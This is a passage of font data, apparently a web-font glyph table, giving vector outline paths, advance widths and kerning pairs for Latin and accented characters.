-143r45,0r0,148xm177,-286r-47,42r-28,0r34,-42r41,0","w":260},{"d":"66,-129r-35,0r0,-84r35,0r0,84xm66,28r-35,0r0,-84r35,0r0,84","w":97},{"d":"221,-117v0,119,-77,122,-187,117r0,-233v109,-4,187,-2,187,116xm174,-117v0,-89,-34,-81,-95,-81r0,163v63,1,95,3,95,-82","w":242,"k":{"V":3,"J":7}},{"d":"240,-116v0,69,-28,123,-109,123v-84,0,-110,-53,-110,-123v0,-68,29,-122,110,-122v80,0,109,50,109,122xm193,-116v0,-62,-20,-87,-62,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,62,-30,62,-88xm171,-291r-48,42r-28,0r35,-42r41,0","w":261},{"d":"175,0r-141,0r0,-233r138,0r0,35r-93,0r0,60r86,0r0,35r-86,0r0,68r96,0r0,35xm152,-249r-30,0r-19,-23r-20,23r-30,0r36,-42r28,0","w":209},{"d":"65,0r-41,0r0,-165r41,0r0,165xm96,-191r-29,0r-19,-23r-20,23r-30,0r36,-42r28,0","w":88},{"d":"250,-117v0,68,-53,121,-120,121v-67,0,-121,-53,-121,-121v0,-68,54,-120,121,-120v68,0,120,52,120,120xm225,-117v0,-54,-41,-97,-95,-97v-54,0,-96,43,-96,97v0,53,43,98,96,98v53,0,95,-45,95,-98xm188,-46r-33,0r-43,-59r-5,0r0,59r-28,0r0,-141v47,2,100,-12,100,41v0,19,-9,37,-35,41xm151,-146v2,-22,-23,-19,-44,-19r0,39v21,0,47,3,44,-20","w":259},{"d":"120,-193r-44,0r0,-40r44,0r0,40xm154,-7v-54,13,-136,32,-136,-50v0,-43,60,-51,60,-84r0,-29r40,0r0,31v0,49,-56,52,-56,82v0,41,61,23,86,13","w":165},{"d":"66,60r-35,0r0,-313r35,0r0,313","w":97},{"d":"156,-204v-32,2,-43,14,-45,39r30,0r-4,28r-30,0r-35,202r-37,0r35,-202r-25,0r5,-28r25,0v2,-53,47,-71,79,-74"},{"d":"150,-131r-94,100r89,0r0,31r-122,0r-14,-33r96,-100r-84,0r0,-32r115,0xm125,-233r-36,42r-28,0r-34,-42r29,0r19,23r20,-23r30,0","w":159},{"d":"178,-67r-162,54r0,-40r122,-36r-122,-35r0,-39r162,53r0,43"},{"d":"215,0r-45,0r0,-103r-91,0r0,103r-45,0r0,-233r45,0r0,95r91,0r0,-95r45,0r0,233","w":249},{"d":"186,-196r-121,161r119,0r0,35r-157,0r-12,-37r123,-161r-109,0r0,-35r146,0xm147,-291r-36,42r-28,0r-35,-42r30,0r19,23r20,-23r30,0","w":201},{"d":"175,0r-141,0r0,-233r138,0r0,35r-93,0r0,60r86,0r0,35r-86,0r0,68r96,0r0,35xm154,-243r-37,0r0,-34r37,0r0,34xm96,-243r-36,0r0,-34r36,0r0,34","w":209},{"d":"171,-189r-78,189r-48,0r85,-185r-111,0r0,-33r138,0"},{"d":"186,-153r-19,20v25,59,9,140,-70,138v-19,0,-34,-4,-46,-11r-18,20r-27,-26r20,-22v-26,-58,-8,-137,71,-136v18,0,32,4,44,10r18,-19xm117,-134v-39,-16,-67,12,-59,65xm75,-32v40,22,68,-15,60,-66","w":193},{"d":"189,0r-8,28v-31,-6,-60,-21,-60,-63r0,-99r-49,0r0,134r-35,0r0,-134r-29,0r0,-31r174,0r0,31r-26,0r0,98v0,23,6,32,33,36"},{"d":"143,-60v-9,-55,-126,-37,-120,-114v5,-69,93,-73,156,-54r-14,39v-19,-17,-104,-20,-96,15v0,19,22,26,47,35v33,12,73,28,73,79v0,82,-102,72,-166,56r14,-38v31,14,104,29,106,-18xm154,-291r-36,42r-28,0r-34,-42r29,0r19,23r21,-23r29,0","w":213},{"d":"235,0r-50,0r-21,-62r-83,0r-22,62r-49,0r95,-233r42,0xm152,-96r-28,-87r-31,87r59,0","w":245,"k":{"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u0178":19,"\u00ff":19,"\u0153":4,"\u0152":9,"\u00d5":9,"\u00e6":4,"\u00a2":4,"\u00fc":4,"\u00fb":4,"\u00f9":4,"\u00fa":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00dc":4,"\u00d6":9,"\u00c7":9,"y":19,"w":19,"v":19,"u":4,"t":4,"q":4,"o":4,"e":4,"d":4,"c":4,"a":4,"Y":19,"W":19,"V":19,"T":19,"Q":4,"O":4,"G":4,"C":4,"A":-1,"@":9,"&":9,"\u00fd":19,"\u00dd":19}},{"d":"178,-83v0,47,-22,88,-81,88v-59,0,-82,-40,-82,-88v0,-46,23,-87,82,-87v60,0,81,39,81,87xm136,-83v0,-40,-12,-55,-39,-55v-26,0,-40,15,-40,55v0,37,13,57,40,57v25,0,39,-17,39,-57xm127,-191r-28,0r-47,-42r41,0","w":193},{"w":97},{"d":"139,-161v0,35,-29,59,-62,59v-33,0,-61,-24,-61,-59v0,-35,28,-61,61,-61v33,0,62,26,62,61xm112,-161v0,-21,-15,-36,-35,-36v-20,0,-35,15,-35,36v0,19,17,34,35,34v18,0,35,-15,35,-34","w":154},{"d":"167,0r-38,0r-7,-17v-22,36,-115,24,-107,-26v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v49,-17,140,-26,139,40v0,43,-1,78,6,117xm120,-44r0,-32v-38,-2,-64,8,-62,31v3,28,55,19,62,1","w":187},{"d":"75,0r-45,0r0,-233r45,0r0,233xm92,-291r-47,42r-28,0r34,-42r41,0","w":104},{"d":"178,-83v0,47,-22,88,-81,88v-59,0,-82,-40,-82,-88v0,-46,23,-87,82,-87v60,0,81,39,81,87xm136,-83v0,-40,-12,-55,-39,-55v-26,0,-40,15,-40,55v0,37,13,57,40,57v25,0,39,-17,39,-57xm152,-214v-6,18,-21,29,-39,29v-26,0,-42,-31,-55,-2r-22,-10v9,-21,21,-27,41,-27v15,0,24,16,35,16v10,0,16,-10,18,-16","w":193},{"d":"176,-64r-62,0r0,64r-34,0r0,-64r-61,0r0,-31r61,0r0,-60r34,0r0,60r62,0r0,31"},{"d":"240,-116v0,69,-28,123,-109,123v-84,0,-110,-53,-110,-123v0,-68,29,-122,110,-122v80,0,109,50,109,122xm193,-116v0,-62,-20,-87,-62,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,62,-30,62,-88xm179,-249r-30,0r-19,-23r-20,23r-29,0r35,-42r28,0","w":261},{"d":"180,42r-180,0r0,-31r180,0r0,31","w":180},{"d":"169,-61v0,79,-93,74,-155,58r14,-37v7,4,32,12,56,12v26,0,39,-16,39,-34v0,-33,-27,-36,-68,-36r0,-33v41,0,63,-2,63,-31v0,-44,-60,-26,-86,-12r-14,-37v53,-23,145,-20,145,48v0,30,-23,45,-49,48v25,4,55,18,55,54"},{"d":"240,-116v0,69,-28,123,-109,123v-84,0,-110,-53,-110,-123v0,-68,29,-122,110,-122v80,0,109,50,109,122xm193,-116v0,-62,-20,-87,-62,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,62,-30,62,-88xm191,-272v-6,18,-21,29,-39,29v-26,0,-42,-31,-55,-2r-22,-10v9,-21,21,-27,41,-27v15,0,24,16,35,16v10,0,16,-10,18,-16","w":261},{"d":"179,-34r-25,25r-56,-57r-57,57r-25,-25r57,-57r-57,-57r25,-24r57,57r56,-57r25,24r-57,57"},{"d":"119,-116r-43,0r0,-40r43,0r0,40xm178,-66r-162,0r0,-27r162,0r0,27xm119,-3r-43,0r0,-39r43,0r0,39"},{"d":"235,0r-50,0r-21,-62r-83,0r-22,62r-49,0r95,-233r42,0xm152,-96r-28,-87r-31,87r59,0xm162,-249r-28,0r-48,-42r41,0","w":245},{"d":"178,-116v0,58,-27,122,-96,122v-13,0,-37,-3,-52,-7r13,-37v12,6,23,10,37,10v42,0,56,-37,56,-71v-39,57,-119,20,-119,-52v0,-44,38,-73,78,-73v71,0,83,55,83,108xm132,-133v0,-48,-16,-57,-38,-57v-18,0,-33,13,-32,41v0,17,1,43,32,43v24,0,33,-14,38,-27"},{"d":"172,0r-38,0r-6,-22v-6,10,-35,38,-60,23r0,64r-41,0r0,-230r41,0r0,106v0,16,1,33,24,33v17,0,27,-20,35,-35r0,-104r40,0v2,55,-5,118,5,165"},{"d":"70,-27r-29,64r-31,0r17,-64r43,0","w":97},{"d":"122,-191r-28,0r-48,-42r41,0xm168,0r-37,0r-6,-22v-7,7,-20,27,-43,27v-84,1,-51,-97,-58,-170r40,0r0,106v0,51,50,33,59,2r0,-108r41,0v1,55,-4,117,4,165","w":187},{"d":"180,-165r-63,165r-40,0r-64,-165r44,0r41,117r40,-117r42,0","w":193,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00bf":9,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00fa":9,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"Y":9,"T":9,"J":9,"A":9,".":19,",":19,"\u0161":4}},{"d":"171,-67r-113,0v4,50,54,48,91,27r14,32v-20,9,-45,13,-68,13v-53,0,-80,-40,-80,-86v0,-38,18,-88,79,-88v57,0,77,33,77,102xm132,-96v-2,-31,-18,-42,-39,-42v-13,0,-34,8,-35,42r74,0","w":187},{"d":"215,0r-54,0r-48,-84r-54,84r-48,0r78,-120r-69,-113r52,0r43,73r46,-73r49,0r-72,111","w":227,"k":{"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u0152":9,"\u00d5":9,"\u00d6":9,"\u00c7":9,"y":9,"w":9,"v":9,"Q":9,"O":9,"G":9,"C":9,"\u00fd":9}},{"d":"113,-148v0,43,-59,41,-95,32r8,-23v9,7,58,13,58,-9v0,-17,-17,-20,-42,-20r0,-20v24,0,39,-1,39,-16v0,-23,-38,-10,-53,-4r-8,-22v30,-13,90,-12,90,26v0,17,-15,24,-30,26v15,2,33,11,33,30","w":131},{"d":"131,-238v118,0,150,167,51,204r0,5r49,0r0,29r-86,0r0,-51v39,-7,48,-35,48,-79v0,-61,-34,-73,-61,-73v-25,0,-62,10,-62,73v0,45,9,74,48,79r0,51r-87,0r0,-29r50,0r0,-5v-42,-13,-58,-55,-58,-95v0,-68,40,-109,108,-109","w":262},{"d":"151,-170r-54,13v8,20,24,32,35,49r-21,15r-30,-48r-4,0r-32,48r-21,-16v10,-16,30,-30,35,-48r-55,-14r8,-25r53,20v7,-13,-1,-40,1,-58r25,0v1,19,-5,43,0,58r53,-19","w":154},{"d":"228,0r-68,0r-83,-179r0,179r-43,0r0,-233r67,0r82,179r0,-179r45,0r0,233","w":261},{"d":"70,-123r-43,0r0,-40r43,0r0,40xm70,-27r-29,64r-31,0r17,-64r43,0","w":97},{"d":"178,-83v0,47,-22,88,-81,88v-59,0,-82,-40,-82,-88v0,-46,23,-87,82,-87v60,0,81,39,81,87xm136,-83v0,-40,-12,-55,-39,-55v-26,0,-40,15,-40,55v0,37,13,57,40,57v25,0,39,-17,39,-57xm140,-233r-47,42r-28,0r35,-42r40,0","w":193},{"d":"116,-64r-106,0r0,-34r106,0r0,34","w":126},{"d":"295,-137v0,72,-57,92,-116,92v-55,0,-85,-25,-85,-71v0,-37,22,-68,76,-68v15,0,33,3,39,5r0,55r7,0r12,29r-56,5r0,-62v-17,-3,-38,0,-38,36v0,39,32,41,45,41v42,0,76,-7,76,-62v0,-57,-44,-69,-81,-69v-34,0,-105,10,-105,91v0,82,73,91,106,91v24,0,47,-4,77,-12r14,33v-114,26,-237,7,-237,-112v0,-85,66,-123,145,-123v50,0,121,25,121,101","w":324},{"d":"218,-233r-84,128r0,105r-45,0r0,-103r-84,-130r52,0r56,89r56,-89r49,0xm161,-257r-36,0r0,-34r36,0r0,34xm104,-257r-36,0r0,-34r36,0r0,34","w":222},{"d":"109,-237r-76,241r-34,0r76,-241r34,0","w":108},{"d":"70,-123r-43,0r0,-40r43,0r0,40xm70,0r-43,0r0,-40r43,0r0,40","w":97},{"d":"194,-233r-67,115r38,0r0,31r-45,0r0,18r45,0r0,31r-45,0r0,38r-46,0r0,-38r-45,0r0,-31r45,0r0,-18r-45,0r0,-31r37,0r-66,-115r50,0r49,90r48,-90r47,0"},{"d":"75,0r-45,0r0,-233r45,0r0,233xm81,-249r-28,0r-48,-42r41,0","w":104},{"d":"178,-87r-162,0r0,-31r162,0r0,31xm178,-25r-162,0r0,-31r162,0r0,31"},{"d":"65,-198r-44,0r0,-35r44,0r0,35xm63,-2v0,42,-27,61,-60,73r-14,-34v25,-5,34,-15,34,-36r0,-166r40,0r0,163","w":87},{"d":"178,-165r-69,191v-10,28,-27,50,-63,62r-13,-33v37,-9,32,-35,46,-62r-66,-158r44,0r42,112r36,-112r43,0xm147,-192r-37,0r0,-34r37,0r0,34xm89,-192r-36,0r0,-34r36,0r0,34","w":190},{"d":"179,0r-149,0r-13,-37v35,-25,112,-77,112,-114v0,-59,-51,-41,-91,-21r-14,-37v36,-13,46,-15,70,-15v40,0,80,15,80,71v0,46,-61,96,-96,119r101,0r0,34"},{"d":"144,-141v-12,0,-29,3,-29,-9v-13,20,-69,12,-64,-15v-3,-20,21,-35,62,-33v5,-27,-37,-15,-50,-9r-8,-20v29,-9,85,-15,85,22v0,24,-1,43,4,64xm94,-157v13,-1,23,-7,20,-24v-21,-1,-37,2,-37,15v0,8,8,9,17,9"},{"d":"181,-111v0,70,-18,117,-85,117v-66,0,-82,-46,-82,-117v0,-70,22,-113,83,-113v66,0,84,43,84,113xm135,-111v0,-50,-3,-79,-38,-79v-35,0,-38,37,-38,79v0,51,2,83,37,83v35,0,39,-35,39,-83"},{"d":"178,-83v0,47,-22,88,-81,88v-59,0,-82,-40,-82,-88v0,-46,23,-87,82,-87v60,0,81,39,81,87xm136,-83v0,-40,-12,-55,-39,-55v-26,0,-40,15,-40,55v0,37,13,57,40,57v25,0,39,-17,39,-57xm145,-192r-37,0r0,-34r37,0r0,34xm87,-192r-36,0r0,-34r36,0r0,34","w":193},{"d":"183,-97r-38,0r-48,-105r-49,105r-36,0r65,-136r39,0"},{"d":"148,-45v0,62,-85,55,-134,39r14,-34v20,13,78,24,78,-5v0,-10,-15,-14,-32,-19v-26,-8,-57,-18,-57,-57v0,-61,75,-55,126,-38r-14,33v-17,-8,-26,-12,-42,-12v-43,0,-31,29,2,36v26,6,59,18,59,57xm130,-233r-36,42r-28,0r-34,-42r29,0r19,23r20,-23r30,0","w":162},{"d":"118,-143r-43,29r0,114r-45,0r0,-84r-20,13r-19,-30r39,-26r0,-106r45,0r0,76r23,-16","w":104},{"d":"258,0r-239,0r101,-233r37,0xm209,-31r-70,-168r-70,168r140,0","w":277},{"d":"67,-233r-3,78r-31,0r-2,-78r36,0","w":97},{"d":"143,-60v-9,-55,-126,-37,-120,-114v5,-69,93,-73,156,-54r-14,39v-19,-17,-104,-20,-96,15v0,19,22,26,47,35v33,12,73,28,73,79v0,82,-102,72,-166,56r14,-38v31,14,104,29,106,-18","w":213},{"d":"228,0r-68,0r-83,-179r0,179r-43,0r0,-233r67,0r82,179r0,-179r45,0r0,233xm189,-272v-6,18,-22,29,-40,29v-26,0,-41,-30,-54,-2r-22,-10v9,-21,20,-27,40,-27v15,0,25,16,36,16v10,0,16,-10,18,-16","w":261},{"d":"114,42v-104,-3,-41,-118,-97,-122r0,-31v55,-2,-8,-118,97,-122r0,31v-54,0,-12,85,-61,107v50,18,7,106,61,106r0,31","w":140},{"d":"65,0r-41,0r0,-165r41,0r0,165","w":88},{"d":"218,-233r-84,128r0,105r-45,0r0,-103r-84,-130r52,0r56,89r56,-89r49,0xm138,-291r-48,42r-28,0r35,-42r41,0","w":222,"k":{"\u00d2":9,"\u00d3":9,"\u00c1":19,"\u00c2":19,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00c3":19,"\u00c0":19,"\u00f8":9,"\u00e6":9,"\u00d8":9,"\u00c6":19,"\u00a2":9,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00d6":9,"\u00c7":9,"\u00c5":19,"\u00c4":19,"s":9,"q":9,"o":9,"g":9,"e":9,"d":9,"c":9,"a":9,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":19,".":19,",":19}},{"d":"198,-120v0,69,-52,75,-119,72r0,48r-45,0r0,-233r45,0r0,44v65,-2,119,2,119,69xm152,-120v0,-47,-36,-31,-73,-34r0,72v39,0,73,8,73,-38","w":216},{"d":"221,-117v0,119,-77,122,-187,117r0,-115r-24,0r0,-31r24,0r0,-87v109,-4,187,-2,187,116xm174,-117v0,-89,-34,-81,-95,-81r0,52r37,0r0,31r-37,0r0,80v63,1,95,3,95,-82","w":242,"k":{"A":4}},{"d":"176,0r-142,0r0,-86r-22,15r-20,-30r42,-28r0,-104r45,0r0,74r20,-14r20,30r-40,27r0,80r97,0r0,36","w":178},{"d":"148,-45v0,62,-85,55,-134,39r14,-34v20,13,78,24,78,-5v0,-10,-15,-14,-32,-19v-26,-8,-57,-18,-57,-57v0,-61,75,-55,126,-38r-14,33v-17,-8,-26,-12,-42,-12v-43,0,-31,29,2,36v26,6,59,18,59,57","w":162},{"d":"69,-66r-41,0r0,-167r41,0r0,167xm70,0r-43,0r0,-40r43,0r0,40","w":97},{"d":"95,46r-37,0v-58,-86,-48,-200,-2,-279r37,0v-45,86,-48,188,2,279","w":113},{"d":"174,-60v0,44,-27,60,-63,65r0,30r-32,0r0,-28v-22,0,-43,-5,-64,-11r14,-38v16,6,32,13,50,14r0,-75v-31,-12,-65,-26,-65,-71v0,-39,30,-58,65,-63r0,-32r32,0r0,32v17,1,38,4,53,9r-14,39v-10,-5,-23,-11,-39,-13r0,67v31,12,63,28,63,75xm80,-148r0,-53v-33,11,-26,43,0,53xm110,-32v26,-7,25,-47,0,-56r0,56"},{"d":"269,-31r-20,0r0,31r-28,0r0,-31r-53,0r-9,-21r59,-68r31,0r0,68r20,0r0,21xm229,-226r-131,226r-35,0r130,-226r36,0xm113,-148v0,43,-59,41,-95,32r8,-23v9,7,58,13,58,-9v0,-17,-17,-20,-42,-20r0,-20v24,0,39,-1,39,-16v0,-23,-38,-10,-53,-4r-8,-22v30,-13,90,-12,90,26v0,17,-15,24,-30,26v15,2,33,11,33,30xm221,-52r0,-43r-37,43r37,0","w":298},{"d":"156,-180v-1,56,-98,47,-98,114v0,19,8,41,37,41v15,0,27,-11,37,-24r0,-29r-32,0r0,-29r72,0v-1,35,0,82,6,107r-38,0r-6,-16v-36,41,-118,25,-117,-49v0,-22,5,-50,38,-67v-10,-8,-31,-20,-31,-46v0,-33,18,-61,66,-61v41,0,66,20,66,59xm115,-180v0,-14,-5,-28,-26,-28v-37,0,-25,52,-5,60v15,-6,31,-15,31,-32"},{"d":"186,-58r-34,0r0,58r-45,0r0,-58r-87,0r-15,-35r98,-126r49,0r0,127r34,0r0,34xm107,-92r0,-84r-65,84r65,0"},{"d":"274,0r-91,0r-8,-22v21,-14,69,-40,69,-61v0,-31,-32,-20,-56,-10r-8,-22v42,-14,93,-16,93,31v0,25,-41,50,-62,63r63,0r0,21xm215,-226r-131,226r-35,0r134,-226r32,0xm82,-113r-29,0r0,-94r-23,18r-8,-20r33,-24r29,0","w":298},{"d":"167,0r-38,0r-7,-17v-22,36,-115,24,-107,-26v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v49,-17,140,-26,139,40v0,43,-1,78,6,117xm120,-44r0,-32v-38,-2,-64,8,-62,31v3,28,55,19,62,1xm140,-190r-37,0r0,-36r37,0r0,36xm82,-190r-37,0r0,-36r37,0r0,36","w":187},{"d":"240,-116v0,69,-28,123,-109,123v-84,0,-110,-53,-110,-123v0,-68,29,-122,110,-122v80,0,109,50,109,122xm193,-116v0,-62,-20,-87,-62,-87v-43,0,-63,26,-63,87v0,64,20,88,63,88v45,0,62,-30,62,-88xm154,-249r-28,0r-48,-42r41,0","w":261},{"d":"172,-198r-93,0r0,62r89,0r0,34r-89,0r0,102r-45,0r0,-233r138,0r0,35","w":190},{"d":"84,46r-63,0r0,-30r28,0r0,-231r-28,0r0,-28r63,0r0,289","w":109},{"d":"176,-71v0,77,-90,89,-159,68r13,-37v16,6,41,12,58,12v61,0,53,-80,11,-80v-23,0,-34,9,-45,15r-29,-11r0,-115r142,0r0,34r-98,0r0,48v52,-16,107,5,107,66"},{"d":"115,-114r-91,0r-8,-22v21,-14,69,-41,69,-62v0,-32,-33,-19,-56,-9r-8,-22v42,-16,93,-16,93,31v0,25,-40,50,-61,63r62,0r0,21","w":131},{"d":"276,-165r-54,165r-43,0r-34,-101r-37,101r-43,0r-54,-165r43,0r36,115r37,-100r40,0r34,100r33,-115r42,0","w":286,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00bf":9,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"\u00c4":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"Y":9,"T":9,"J":9,"A":9,".":31,",":31,"\u0161":4}},{"d":"120,-210v-35,4,-53,14,-51,45r38,0r0,32r-38,0r0,133r-40,0r0,-133r-25,0r0,-32r25,0v-2,-53,46,-75,81,-78","w":120},{"d":"66,-198r-43,0r0,-35r43,0r0,35xm65,0r-41,0r0,-165r41,0r0,165","w":88},{"d":"186,-196r-121,161r119,0r0,35r-157,0r-12,-37r123,-161r-109,0r0,-35r146,0","w":201,"k":{"O":4}},{"d":"235,0r-50,0r-21,-62r-83,0r-22,62r-49,0r95,-233r42,0xm152,-96r-28,-87r-31,87r59,0xm164,-291r-47,42r-28,0r35,-42r40,0","w":245},{"d":"175,0r-141,0r0,-233r138,0r0,35r-93,0r0,60r86,0r0,35r-86,0r0,68r96,0r0,35xm134,-286r-48,42r-28,0r35,-42r41,0","w":209},{"d":"322,0r-135,0r-9,-62r-82,0r-34,62r-52,0r133,-233r176,0r0,35r-121,0r10,60r103,0r0,35r-97,0r12,68r96,0r0,35xm173,-96r-13,-87r-46,87r59,0","w":355},{"d":"91,-199r-36,0r0,-34r36,0r0,34xm34,-199r-37,0r0,-34r37,0r0,34","w":88},{"d":"336,-233r-60,233r-56,0r-45,-163r-54,163r-56,0r-53,-233r48,0r39,178r51,-168r56,0r43,168r43,-178r44,0","w":348,"k":{"\u0131":9,"\u00d2":9,"\u00d4":9,"\u00d3":9,"\u00c1":31,"\u00c2":31,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00c3":31,"\u00c0":31,"\u00bf":19,"\u00f8":9,"\u00e6":9,"\u00b5":9,"\u00d8":9,"\u00c6":31,"\u00a2":9,"\u00fc":9,"\u00fb":9,"\u00f9":9,"\u00fa":9,"\u00f5":9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00f1":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\u00e5":9,"\u00e3":9,"\u00e4":9,"\u00e2":9,"\u00e0":9,"\u00e1":9,"\u00d6":9,"\u00c7":9,"\u00c5":31,"\u00c4":31,"z":9,"y":9,"x":9,"w":4,"v":4,"u":9,"s":9,"r":9,"q":9,"p":9,"o":9,"n":9,"m":9,"j":9,"i":9,"g":9,"e":9,"d":9,"c":9,"a":9,"Q":9,"O":9,"J":19,"G":9,"C":9,"A":31,";":19,":":19,".":19,",":19,"\u017e":9,"\u00fd":9,"\u0161":9}},{"d":"181,-56v0,48,-38,62,-85,62v-46,0,-82,-14,-82,-62v0,-32,19,-51,52,-59v-11,-4,-45,-15,-45,-49v0,-37,26,-60,77,-60v55,0,77,18,77,59v0,33,-33,47,-47,50v34,9,53,26,53,59xm97,-130v32,-3,57,-60,1,-60v-27,0,-33,10,-33,27v0,19,18,28,32,33xm136,-57v0,-25,-17,-35,-38,-42v-40,3,-64,71,-2,72v28,0,40,-13,40,-30"},{"d":"207,-14v-24,14,-43,21,-78,21v-86,0,-108,-61,-108,-124v0,-72,33,-121,111,-121v16,0,41,6,58,10r-14,38v-53,-25,-108,-19,-108,73v0,74,44,106,99,80r0,-53r-52,0r0,-35r92,0r0,111","w":228},{"d":"172,-165v-11,68,-3,154,-5,230r-40,0r0,-81v-9,13,-28,21,-43,21v-51,0,-69,-40,-69,-86v0,-47,22,-89,71,-89v21,0,36,17,41,27r7,-22r38,0xm127,-50r0,-58v-16,-43,-70,-44,-70,26v0,71,48,67,70,32","w":191},{"d":"178,-165r-69,191v-10,28,-27,50,-63,62r-13,-33v37,-9,32,-35,46,-62r-66,-158r44,0r42,112r36,-112r43,0xm133,-233r-47,42r-28,0r34,-42r41,0","w":190,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"\u00c4":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"T":9,"J":19,"A":9,".":19,",":19,"\u0161":4}},{"d":"178,-165r-69,191v-10,28,-27,50,-63,62r-13,-33v37,-9,32,-35,46,-62r-66,-158r44,0r42,112r36,-112r43,0","w":190,"k":{"\u00c1":9,"\u00c2":9,"\u0153":4,"\u00c3":9,"\u00c0":9,"\u00f8":4,"\u00e6":4,"\u00c6":9,"\u00a2":4,"\u00f5":4,"\u00f6":4,"\u00f4":4,"\u00f2":4,"\u00f3":4,"\u00eb":4,"\u00ea":4,"\u00e8":4,"\u00e9":4,"\u00e7":4,"\u00e5":4,"\u00e3":4,"\u00e4":4,"\u00e2":4,"\u00e0":4,"\u00e1":4,"\u00c5":9,"\u00c4":9,"s":4,"q":4,"o":4,"g":4,"e":4,"d":4,"c":4,"a":4,"T":9,"J":9,"A":9,".":19,",":19,"\u0161":4}},{"d":"170,0r-46,0r-35,-55r-38,55r-43,0r60,-83r-56,-82r46,0r32,52r34,-52r43,0r-56,79","w":177},{"d":"168,0r-37,0r-6,-22v-7,7,-20,27,-43,27v-84,1,-51,-97,-58,-170r40,0r0,106v0,51,50,33,59,2r0,-108r41,0v1,55,-4,117,4,165","w":187},{"d":"64,0r-40,0r0,-237r40,0r0,237","w":88},{"d":"178,-13r-162,-53r0,-43r162,-54r0,39r-121,36r121,35r0,40"},{"d":"58,-233v46,78,56,193,-1,279r-38,0v51,-92,46,-193,2,-279r37,0","w":113},{"d":"88,-113r-29,0r0,-94r-23,18r-8,-20v18,-10,27,-29,60,-24r0,120","w":131},{"d":"176,0r-142,0r0,-233r45,0r0,197r97,0r0,36","w":178,"k":{"Y":35,"W":23,"V":26,"T":23,"O":7}},{"d":"117,0r-10,35v-40,-10,-75,-36,-75,-78r0,-90r-27,0r0,-32r27,0r0,-44r41,0r0,44r38,0r0,32r-38,0v4,59,-19,129,44,133","w":120},{"d":"93,46r-63,0r0,-289r63,0r0,28r-29,0r0,231r29,0r0,30","w":109},{"d":"194,-4v-21,7,-39,11,-65,11v-78,0,-108,-50,-108,-123v0,-65,26,-122,109,-122v20,0,44,4,62,10r-15,38v-55,-30,-109,-6,-109,73v0,85,53,107,112,75","w":207},{"d":"176,-81v0,46,-21,86,-68,86v-15,0,-35,-8,-44,-21r0,81r-40,0v-2,-76,5,-162,-5,-230r38,0r7,22v7,-10,20,-27,41,-27v51,0,71,42,71,89xm134,-82v0,-69,-55,-70,-70,-26r0,58v22,36,70,39,70,-32","w":191},{"d":"274,-66r-113,0v4,50,53,46,90,26r13,32v-39,20,-113,18,-127,-17v-23,44,-127,39,-122,-18v-4,-37,35,-64,105,-60v0,-19,0,-35,-24,-35v-23,0,-44,7,-60,15r-14,-34v38,-13,100,-21,125,7v11,-10,26,-19,48,-19v60,0,79,34,79,103xm233,-96v-2,-31,-17,-42,-38,-42v-13,0,-33,8,-34,42r72,0xm87,-27v24,0,38,-17,33,-47v-38,-1,-62,6,-62,29v0,14,14,18,29,18","w":289},{"d":"232,0r-58,0r-95,-106r0,106r-45,0r0,-233r45,0r0,98r86,-98r51,0r-95,110","w":237,"k":{"\u00d9":4,"\u00db":4,"\u00da":4,"\u00d2":9,"\u00d3":9,"\u00ff":19,"\u0153":9,"\u0152":9,"\u00d5":9,"\u00e6":9,"\u00a2":9,"\u00fc":9,"\u00fb":9,"\u00f9":9,"\u00fa":9,"\u00f5":-9,"\u00f6":9,"\u00f4":9,"\u00f2":9,"\u00f3":9,"\u00eb":9,"\u00ea":9,"\u00e8":9,"\u00e9":9,"\u00e7":9,"\